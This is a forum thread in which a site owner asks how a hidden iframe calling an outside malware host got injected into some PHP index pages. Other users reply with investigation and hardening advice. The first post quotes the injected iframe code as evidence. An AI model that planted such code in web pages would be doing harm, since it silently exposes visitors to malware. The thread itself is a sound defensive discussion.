iframe worm or malware infected my php pages

Results 1 to 4 of 4

Thread: iframe worm or malware infected my php pages

  1. #1
    Join Date
    Dec 2004

    iframe worm or malware infected my php pages

    Hi there,
    Recently some users told me that their antivirus software prompts them when they visit my web site telling them that some malware is present.
    Now my site was reported as suspicious and Firefox and IE block access to it. Google also suspended my adwords account.

    After some researches I've found that someone/something inserted the code:

    <iframe src="http://lotmachinesguide.cn/in.cgi?income58" width=1 height=1 style="visibility: hidden">

    on some index.php files (not all of them) and only from one web site (on the server there are many websites hosted).

    On the server runs Apache/2.2.11 (FreeBSD).

    I've removed the code but the problem could reappear so I must get to the source: how was the code inserted, by whom and if the server is compromised?

    Does anyone know something about this? What should I do further?

    rkhunter and chkrootkit say that everything is ok.

    Thanks you
    Best regards,

  2. #2
    Join Date
    Sep 1999
    Should've looked at permissions for the file and ownership before changing it... that could tell you what account had rights to do it. I'd grep for the file name(s) in the various bash_history files, etc.

  3. #3
    Join Date
    Nov 2002
    I'd venture to guess that it wasn't someone who had shell access to the server. It was probably brought in via an ftp client, either on purpose or one that was compromised. If you have another one you can check the modified time and look for ftp logs...
    but really, i dont know what im talking about.

  4. #4
    Join Date
    Apr 2001
    SF Bay Area, CA
    Quote Originally Posted by ddaas View Post
    on some index.php files
    Disable PHP?

    You probably have some insecure page somewhere else (directory traversal, not securing access, something like that) which is allowing someone to add this HTML to all these pages. It's very likely one of your PHP scripts. If you disable PHP, I bet that will prevent any future occurrences of this.

    Alternately, if this site has WebDAV enabled (...why?), then someone might have learned your username and password (...you do use one when using WebDAV, right?) and used that to modify the files. Disabling WebDAV would work, in that case.

    If it was a script, and you can find out which script they used, you can either fix it, or upgrade it to a non-vulnerable version (...you *do* monitor the security lists for all the PHP stuff you have installed, right? third-party forum pages, blog software, and whatever else?). But finding that out might be hard. If you had the modification time of the various .php files (which you destroyed when you changed them again), you could try to correlate that with entries in the Apache logs (which would catch both WebDAV and problematic PHP stuff), but that's going to be hard now. Though it may have been impossible before as well, as the attacker may have been able to remove their log entries. Don't know for sure though.

    There have been several rashes of automated compromises of various PHP-based webpage packages, about a year ago or so. (Various forums, various blog generaters, etc.) I've stopped paying attention since then, since I've sworn off PHP entirely. Wouldn't surprise me if someone found that your site used some vulnerable version of some PHP thing (via some search engine, is how they did it last year), and used that vulnerability to compromise the server.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts